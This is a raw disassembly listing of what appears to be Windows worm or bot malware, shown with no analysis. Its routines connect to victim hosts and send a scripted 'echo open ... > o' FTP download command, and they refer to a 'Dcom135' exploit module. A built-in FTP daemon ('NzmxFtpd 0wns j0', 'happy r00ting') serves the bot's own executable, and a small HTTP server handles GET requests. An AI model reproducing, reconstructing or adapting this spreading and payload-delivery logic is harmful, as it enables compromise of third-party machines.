; ---------------------------------------------------------------------------
loc_4050FE: ; CODE XREF: _0:004050F2�j
call ds:dword_424220 ; closesocket
push 216Bh
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_404F9A
add esp, 0C0h
test eax, eax
jz short loc_40513D
mov eax, [ebp+0B0h]
imul eax, 3Ch
inc ds:dword_42ACB8[eax]
lea eax, dword_42ACB8[eax]
loc_40513D: ; CODE XREF: _0:00405126�j
push 1
pop eax
loc_405140: ; CODE XREF: _0:004050FC�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405144 proc near ; CODE XREF: _0:00405340�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call ds:dword_43F6A8 ; inet_addr
mov [ebp+var_C], eax
mov ax, ds:word_42A040
push eax
call ds:dword_43F668 ; htons
push edi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_43F6E8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_40525B
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_43F610 ; connect
cmp eax, 0FFFFFFFFh
jz loc_40525B
mov ebx, 400h
push edi
lea eax, [ebp+var_5A0]
push ebx
push eax
push esi
call ds:dword_43F680 ; recv
push ds:dword_43C83C
push [ebp+arg_0]
call sub_40AEE0
pop ecx
mov edi, 190h
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41782A
add esp, 14h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push esi
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40525B
push 1F4h
call ds:dword_424064 ; Sleep
push offset byte_42F678
push offset dword_428598
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push esi
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40525F
loc_40525B: ; CODE XREF: sub_405144+51�j
; sub_405144+67�j ...
xor al, al
jmp short loc_405279
; ---------------------------------------------------------------------------
loc_40525F: ; CODE XREF: sub_405144+115�j
push 0
lea eax, [ebp+var_5A0]
push ebx
push eax
push esi
call ds:dword_43F680 ; recv
push esi
call ds:dword_43F700 ; closesocket
mov al, 1
loc_405279: ; CODE XREF: sub_405144+119�j
pop edi
pop esi
pop ebx
leave
retn
sub_405144 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
lea eax, [ebp+0Ch]
push edi
push eax
call ds:dword_4241F8 ; gethostbyname
mov esi, eax
test esi, esi
jnz short loc_4052A8
lea eax, [ebp+0Ch]
push eax
call ds:dword_4241FC ; inet_addr
mov ebx, eax
jmp short loc_4052AE
; ---------------------------------------------------------------------------
loc_4052A8: ; CODE XREF: _0:00405298�j
mov ebx, [ebp+0C0h]
loc_4052AE: ; CODE XREF: _0:004052A6�j
push 11h
push 2
push 2
call ds:dword_424214 ; socket
test esi, esi
mov edi, eax
jz short loc_4052D8
movsx eax, word ptr [esi+0Ah]
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
lea eax, [ebp-0Ch]
push eax
call sub_417390
add esp, 0Ch
jmp short loc_4052DB
; ---------------------------------------------------------------------------
loc_4052D8: ; CODE XREF: _0:004052BE�j
mov [ebp-0Ch], ebx
loc_4052DB: ; CODE XREF: _0:004052D6�j
test esi, esi
jz short loc_4052E9
mov ax, [esi+8]
mov [ebp-10h], ax
jmp short loc_4052EF
; ---------------------------------------------------------------------------
loc_4052E9: ; CODE XREF: _0:004052DD�j
mov word ptr [ebp-10h], 2
loc_4052EF: ; CODE XREF: _0:004052E7�j
push 599h
call ds:dword_424224 ; htons
mov [ebp-0Eh], ax
lea eax, [ebp-10h]
push 10h
push eax
push edi
call ds:dword_42421C ; connect
test eax, eax
jnz loc_4053BE
push eax
push 1C9h
push offset loc_429E74
push edi
call ds:dword_424208 ; send
push 3E8h
call ds:dword_424064 ; Sleep
sub esp, 0BCh
lea esi, [ebp+8]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_405144
add esp, 0BCh
test al, al
jz short loc_405354
push 1
pop eax
jmp short loc_4053D0
; ---------------------------------------------------------------------------
loc_405354: ; CODE XREF: _0:0040534D�j
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
push offset unk_42A0B0
lea eax, [ebp-210h]
push 200h
push eax
call sub_41782A
push 0
lea eax, [ebp-210h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_40D679
lea eax, [ebp-210h]
push eax
call sub_40BF6D
mov eax, [ebp+0B0h]
add esp, 2Ch
imul eax, 3Ch
inc ds:dword_42ACB8[eax]
lea eax, dword_42ACB8[eax]
jmp short loc_4053CE
; ---------------------------------------------------------------------------
loc_4053BE: ; CODE XREF: _0:0040530D�j
push 1
push edi
call ds:dword_4241F4 ; shutdown
push edi
call ds:dword_424220 ; closesocket
loc_4053CE: ; CODE XREF: _0:004053BC�j
xor eax, eax
loc_4053D0: ; CODE XREF: _0:00405352�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053D5 proc near ; DATA XREF: sub_407252+226�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A6Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6DC]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A6C]
xor edi, edi
push eax
push 101h
mov [ebp+var_28], ebx
mov [ebp+var_18], ebx
mov [ebp+var_228], edi
mov [ebp+var_438], edi
call ds:dword_4241E0 ; WSAStartup
push edi
call sub_4186B1
push eax
call sub_417300
push 0FEB0h
push 406h
call sub_41544E
add esp, 10h
mov ds:dword_43C83C, eax
push edi
push ebx
push 2
call ds:dword_424214 ; socket
mov esi, eax
lea eax, [ebp+var_28]
push 4
push eax
push 4
push 0FFFFh
push esi
mov [ebp+var_C], esi
call ds:dword_4241E4 ; setsockopt
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
call ds:dword_424218 ; ioctlsocket
mov ax, word ptr ds:dword_43C83C
mov [ebp+var_38], 2
push eax
mov [ebp+var_34], edi
call ds:dword_424224 ; htons
mov [ebp+var_36], ax
lea eax, [ebp+var_38]
push 10h
push eax
push esi
call ds:dword_4241E8 ; bind
test eax, eax
jge short loc_4054AA
mov eax, ebx
jmp loc_4059D4
; ---------------------------------------------------------------------------
loc_4054AA: ; CODE XREF: sub_4053D5+CC�j
push 0Ah
push esi
call ds:dword_4241EC ; listen
mov [ebp+var_228], ebx
mov ebx, ds:dword_424208
mov [ebp+var_224], esi
mov [ebp+var_4], esi
loc_4054C8: ; CODE XREF: sub_4053D5+12C�j
; sub_4053D5+5F7�j
push 41h
lea esi, [ebp+var_228]
pop ecx
lea edi, [ebp+var_438]
rep movsd
xor esi, esi
lea eax, [ebp+var_438]
push esi
push esi
push esi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call ds:dword_42420C ; select
cmp eax, 0FFFFFFFFh
jz loc_4059D1
xor edi, edi
cmp [ebp+var_4], esi
mov [ebp+arg_0], edi
jl short loc_4054C8
loc_405503: ; CODE XREF: sub_4053D5+5F1�j
xor esi, esi
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_417330
push 64h
lea eax, [ebp+var_AC]
push esi
push eax
call sub_417330
add esp, 18h
lea eax, [ebp+var_438]
push eax
push edi
call sub_422A46 ; __WSAFDIsSet
test eax, eax
jz loc_4059BF
cmp edi, [ebp+var_C]
jnz short loc_4055BA
lea eax, [ebp+var_24]
mov [ebp+var_24], 10h
push eax
lea eax, [ebp+var_238]
push eax
push [ebp+var_C]
call ds:dword_4241F0 ; accept
cmp eax, 0FFFFFFFFh
jz loc_4059BF
xor ecx, ecx
cmp [ebp+var_228], esi
jbe short loc_405584
lea edx, [ebp+var_224]
loc_405574: ; CODE XREF: sub_4053D5+1AD�j
cmp [edx], eax
jz short loc_405584
inc ecx
add edx, 4
cmp ecx, [ebp+var_228]
jb short loc_405574
loc_405584: ; CODE XREF: sub_4053D5+197�j
; sub_4053D5+1A1�j
cmp ecx, [ebp+var_228]
jnz short loc_4055A2
cmp [ebp+var_228], 40h
jnb short loc_4055A2
mov [ebp+ecx*4+var_224], eax
inc [ebp+var_228]
loc_4055A2: ; CODE XREF: sub_4053D5+1B5�j
; sub_4053D5+1BE�j
cmp eax, [ebp+var_4]
jle short loc_4055AA
mov [ebp+var_4], eax
loc_4055AA: ; CODE XREF: sub_4053D5+1D0�j
push esi
push 15h
push offset a220Nzmxftpd0wn ; "220 NzmxFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_4059BF
; ---------------------------------------------------------------------------
loc_4055BA: ; CODE XREF: sub_4053D5+169�j
push esi
lea eax, [ebp+var_29C]
push 64h
push eax
push edi
call ds:dword_424204 ; recv
test eax, eax
jg short loc_405621
mov edx, [ebp+var_228]
xor ecx, ecx
cmp edx, esi
jbe short loc_405615
lea eax, [ebp+var_224]
loc_4055E1: ; CODE XREF: sub_4053D5+216�j
cmp [eax], edi
jz short loc_4055EF
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_4055E1
jmp short loc_405615
; ---------------------------------------------------------------------------
loc_4055EF: ; CODE XREF: sub_4053D5+20E�j
dec edx
cmp ecx, edx
jnb short loc_40560F
lea eax, [ebp+ecx*4+var_224]
loc_4055FB: ; CODE XREF: sub_4053D5+238�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_228]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_4055FB
loc_40560F: ; CODE XREF: sub_4053D5+21D�j
dec [ebp+var_228]
loc_405615: ; CODE XREF: sub_4053D5+204�j
; sub_4053D5+218�j
push edi
call ds:dword_424220 ; closesocket
jmp loc_4059BF
; ---------------------------------------------------------------------------
loc_405621: ; CODE XREF: sub_4053D5+1F8�j
lea eax, [ebp+var_334]
push eax
lea eax, [ebp+var_AC]
push eax
lea eax, [ebp+var_29C]
push offset aSS ; "%s %s"
push eax
call sub_418A52
lea eax, [ebp+var_AC]
push offset aUser_0 ; "USER"
push eax
call sub_4176D0
add esp, 18h
test eax, eax
jnz short loc_405665
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_405665: ; CODE XREF: sub_4053D5+281�j
lea eax, [ebp+var_AC]
push offset aPass ; "PASS"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_405689
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_405689: ; CODE XREF: sub_4053D5+2A5�j
lea eax, [ebp+var_AC]
push offset aSyst ; "SYST"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4056AD
push esi
push 0Dh
push offset a215Nzmxftpd ; "215 NzmxFtpd\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_4056AD: ; CODE XREF: sub_4053D5+2C9�j
lea eax, [ebp+var_AC]
push offset aRest ; "REST"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4056D1
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_4056D1: ; CODE XREF: sub_4053D5+2ED�j
lea eax, [ebp+var_AC]
push offset off_42A2D0
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4056F5
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_4056F5: ; CODE XREF: sub_4053D5+311�j
lea eax, [ebp+var_AC]
push offset aType ; "TYPE"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_405730
lea eax, [ebp+var_334]
push offset aA ; "A"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_405730
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_405730: ; CODE XREF: sub_4053D5+335�j
; sub_4053D5+34C�j
lea eax, [ebp+var_AC]
push offset aType ; "TYPE"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40576B
lea eax, [ebp+var_334]
push offset aI ; "I"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40576B
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_40576B: ; CODE XREF: sub_4053D5+370�j
; sub_4053D5+387�j
lea eax, [ebp+var_AC]
push offset aPasv ; "PASV"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4057B9
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+var_124]
rep movsd
push eax
lea eax, [ebp+var_124]
push eax
movsw
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_124]
loc_4057A9: ; CODE XREF: sub_4053D5+423�j
push eax
push [ebp+arg_0]
call ebx ; send
xor esi, esi
loc_4057B1: ; CODE XREF: sub_4053D5+4F6�j
mov edi, [ebp+arg_0]
jmp loc_4059AD
; ---------------------------------------------------------------------------
loc_4057B9: ; CODE XREF: sub_4053D5+3AB�j
lea eax, [ebp+var_AC]
push offset aList ; "LIST"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4057FA
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C4]
rep movsd
movsw
push eax
lea eax, [ebp+var_C4]
push eax
movsb
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_C4]
jmp short loc_4057A9
; ---------------------------------------------------------------------------
loc_4057FA: ; CODE XREF: sub_4053D5+3F9�j
lea eax, [ebp+var_AC]
push offset aPort ; "PORT"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_4058D0
lea eax, [ebp+var_2D0]
push eax
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_29C]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_418A52
lea eax, [ebp+var_F8]
push eax
call sub_41781F
mov edi, eax
lea eax, [ebp+var_2D0]
push eax
call sub_41781F
mov [ebp+var_8], eax
push 32h
lea eax, [ebp+var_F8]
push esi
push eax
call sub_417330
add esp, 34h
lea eax, [ebp+var_F8]
push [ebp+var_8]
push edi
push offset aXX ; "%x%x\n"
push eax
call sub_4172AE
push 10h
lea eax, [ebp+var_F8]
push esi
push eax
call sub_418A3B
add esp, 1Ch
mov [ebp+var_8], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_4172AE
add esp, 18h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
push [ebp+arg_0]
call ebx ; send
jmp loc_4057B1
; ---------------------------------------------------------------------------
loc_4058D0: ; CODE XREF: sub_4053D5+43A�j
lea eax, [ebp+var_AC]
push offset aRetr ; "RETR"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40598B
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; send
push [ebp+var_8]
lea eax, [ebp+var_48]
push eax
call sub_4059DB
pop ecx
cmp eax, 1
pop ecx
jnz short loc_405981
call sub_405A58
cmp eax, 1
jnz loc_4059AD
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push edi
call ebx ; send
lea eax, [ebp+var_6D8]
push eax
lea eax, [ebp+var_48]
push ds:dword_43C83C
push eax
lea eax, [ebp+var_8DC]
push offset unk_42A128
push eax
call sub_4172AE
add esp, 14h
cmp [ebp+var_440], esi
jnz short loc_405972
push esi
lea eax, [ebp+var_8DC]
push [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
push eax
push [ebp+var_6DC]
call sub_40D679
add esp, 14h
loc_405972: ; CODE XREF: sub_4053D5+578�j
lea eax, [ebp+var_8DC]
push eax
call sub_40BF6D
pop ecx
jmp short loc_4059AD
; ---------------------------------------------------------------------------
loc_405981: ; CODE XREF: sub_4053D5+532�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_4059AA
; ---------------------------------------------------------------------------
loc_40598B: ; CODE XREF: sub_4053D5+510�j
lea eax, [ebp+var_AC]
push offset aQuit ; "QUIT"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4059AD
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_4059AA: ; CODE XREF: sub_4053D5+28B�j
; sub_4053D5+2AF�j ...
push edi
call ebx ; send
loc_4059AD: ; CODE XREF: sub_4053D5+3DF�j
; sub_4053D5+53C�j ...
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_417330
add esp, 0Ch
loc_4059BF: ; CODE XREF: sub_4053D5+160�j
; sub_4053D5+189�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_405503
jmp loc_4054C8
; ---------------------------------------------------------------------------
loc_4059D1: ; CODE XREF: sub_4053D5+11E�j
push 1
pop eax
loc_4059D4: ; CODE XREF: sub_4053D5+D0�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_4053D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059DB proc near ; CODE XREF: sub_4053D5+528�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_4241E0 ; WSAStartup
push 0
push 1
push 2
call ds:dword_424214 ; socket
push [ebp+arg_0]
mov ds:dword_43C838, eax
mov [ebp+var_10], 2
call ds:dword_4241FC ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_424224 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push ds:dword_43C838
call ds:dword_42421C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_405A53
push ds:dword_43C838
call ds:dword_424220 ; closesocket
call ds:dword_424200 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_405A53: ; CODE XREF: sub_4059DB+60�j
push 1
pop eax
leave
retn
sub_4059DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A58 proc near ; CODE XREF: sub_4053D5+534�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call ds:off_424094
lea eax, [ebp+var_104]
push offset aRb ; "rb"
push eax
call sub_4179A8
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_405AEF
test byte ptr [esi+0Ch], 10h
jnz short loc_405AD3
push edi
mov edi, 400h
loc_405A9B: ; CODE XREF: sub_405A58+78�j
push esi
push 1
lea eax, [ebp+var_504]
push edi
push eax
call sub_418A86
add esp, 10h
lea eax, [ebp+var_504]
push 0
push edi
push eax
push ds:dword_43C838
call ds:dword_424208 ; send
push 1
call ds:dword_424064 ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_405A9B
pop edi
loc_405AD3: ; CODE XREF: sub_405A58+3B�j
push esi
call sub_417900
pop ecx
push ds:dword_43C838
call ds:dword_424220 ; closesocket
call ds:dword_424200 ; WSACleanup
push 1
pop eax
loc_405AEF: ; CODE XREF: sub_405A58+35�j
pop esi
leave
retn
sub_405A58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405AF2 proc near ; DATA XREF: sub_407252+333�o
; sub_40EE72+54E6�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_417B30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
mov [ebp+var_14], esi
call sub_417330
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+var_25C]
call ds:dword_43F668 ; htons
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call ds:dword_43F6E8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_405EDD
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov ds:dword_4450CC[eax], edi
lea eax, [ebp+var_24]
push eax
push edi
call ds:dword_43F694 ; bind
cmp eax, 0FFFFFFFFh
jz loc_405EDD
push 7FFFFFFFh
push edi
call ds:dword_43F690 ; listen
cmp eax, 0FFFFFFFFh
jz loc_405EDD
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call ds:dword_43F704 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_405EDD
mov ebx, esi
mov [ebp+var_134], edi
mov [ebp+var_138], ebx
mov [ebp+var_8], edi
loc_405BC9: ; CODE XREF: sub_405AF2+3E1�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_138]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_8]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call ds:dword_43F650 ; select
cmp eax, 0FFFFFFFFh
jz loc_405ED8
xor esi, esi
mov [ebp+var_4], esi
loc_405BFF: ; CODE XREF: sub_405AF2+3DB�j
lea eax, [ebp+var_6F0]
push eax
push esi
call ds:dword_43F560 ; __WSAFDIsSet
test eax, eax
jz loc_405EC3
cmp esi, [ebp+var_C]
jnz short loc_405C81
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+var_C]
call ds:dword_43F6FC ; accept
cmp eax, 0FFFFFFFFh
jz loc_405EC3
xor ecx, ecx
test ebx, ebx
jbe short loc_405C53
lea edx, [ebp+var_134]
loc_405C47: ; CODE XREF: sub_405AF2+15F�j
cmp [edx], eax
jz short loc_405C53
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_405C47
loc_405C53: ; CODE XREF: sub_405AF2+14D�j
; sub_405AF2+157�j
cmp ecx, ebx
jnz short loc_405C70
cmp ebx, 40h
jnb short loc_405C70
mov [ebp+ecx*4+var_134], eax
mov ebx, [ebp+var_138]
inc ebx
mov [ebp+var_138], ebx
loc_405C70: ; CODE XREF: sub_405AF2+163�j
; sub_405AF2+168�j
cmp eax, [ebp+var_8]
jbe loc_405EC3
mov [ebp+var_8], eax
jmp loc_405EC3
; ---------------------------------------------------------------------------
loc_405C81: ; CODE XREF: sub_405AF2+126�j
mov edi, 1000h
lea eax, [ebp+var_28F0]
push edi
push 0
push eax
call sub_417330
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_417330
add esp, 18h
lea eax, [ebp+var_28F0]
push 0
push edi
push eax
push esi
call ds:dword_43F680 ; recv
test eax, eax
jg short loc_405D14
push esi
call ds:dword_43F700 ; closesocket
xor ecx, ecx
test ebx, ebx
jbe loc_405EC3
lea eax, [ebp+var_134]
loc_405CD3: ; CODE XREF: sub_405AF2+1EB�j
cmp [eax], esi
jz short loc_405CE4
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_405CD3
jmp loc_405EC3
; ---------------------------------------------------------------------------
loc_405CE4: ; CODE XREF: sub_405AF2+1E3�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_405D08
lea eax, [ebp+ecx*4+var_134]
loc_405CF2: ; CODE XREF: sub_405AF2+214�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_405CF2
loc_405D08: ; CODE XREF: sub_405AF2+1F7�j
dec ebx
mov [ebp+var_138], ebx
jmp loc_405EC3
; ---------------------------------------------------------------------------
loc_405D14: ; CODE XREF: sub_405AF2+1C8�j
xor esi, esi
push 104h
lea eax, [ebp+var_23C]
push esi
push eax
call sub_417330
lea eax, [ebp+var_28F0]
mov [ebp+arg_0], esi
push eax
call sub_417AB0
add esp, 10h
test eax, eax
jbe loc_405EC3
loc_405D42: ; CODE XREF: sub_405AF2+309�j
mov eax, [ebp+arg_0]
mov al, [ebp+eax+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_405DE7
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jz short loc_405DBB
lea eax, [ebp+var_18F0]
push eax
call sub_417AB0
cmp eax, 5
pop ecx
jbe short loc_405DBB
mov eax, offset asc_42A3B4 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_417880
pop ecx
pop ecx
push eax
call sub_417880
pop ecx
pop ecx
push eax
call sub_418B6E
push eax
lea eax, [ebp+var_23C]
push eax
call sub_4179C0
add esp, 10h
jmp short loc_405DD2
; ---------------------------------------------------------------------------
loc_405DBB: ; CODE XREF: sub_405AF2+27F�j
; sub_405AF2+291�j
lea eax, [ebp+var_18F0]
push offset asc_42A3B0 ; "\r\n"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_405E06
loc_405DD2: ; CODE XREF: sub_405AF2+2C7�j
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_417330
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_405DE7: ; CODE XREF: sub_405AF2+263�j
inc [ebp+arg_0]
lea eax, [ebp+var_28F0]
push eax
inc esi
call sub_417AB0
cmp [ebp+arg_0], eax
pop ecx
jb loc_405D42
jmp loc_405EC3
; ---------------------------------------------------------------------------
loc_405E06: ; CODE XREF: sub_405AF2+2DE�j
xor ecx, ecx
test ebx, ebx
jbe short loc_405E50
lea eax, [ebp+var_134]
loc_405E12: ; CODE XREF: sub_405AF2+32D�j
mov esi, [ebp+var_4]
cmp [eax], esi
jz short loc_405E23
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_405E12
jmp short loc_405E53
; ---------------------------------------------------------------------------
loc_405E23: ; CODE XREF: sub_405AF2+325�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_405E47
lea eax, [ebp+ecx*4+var_134]
loc_405E31: ; CODE XREF: sub_405AF2+353�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_405E31
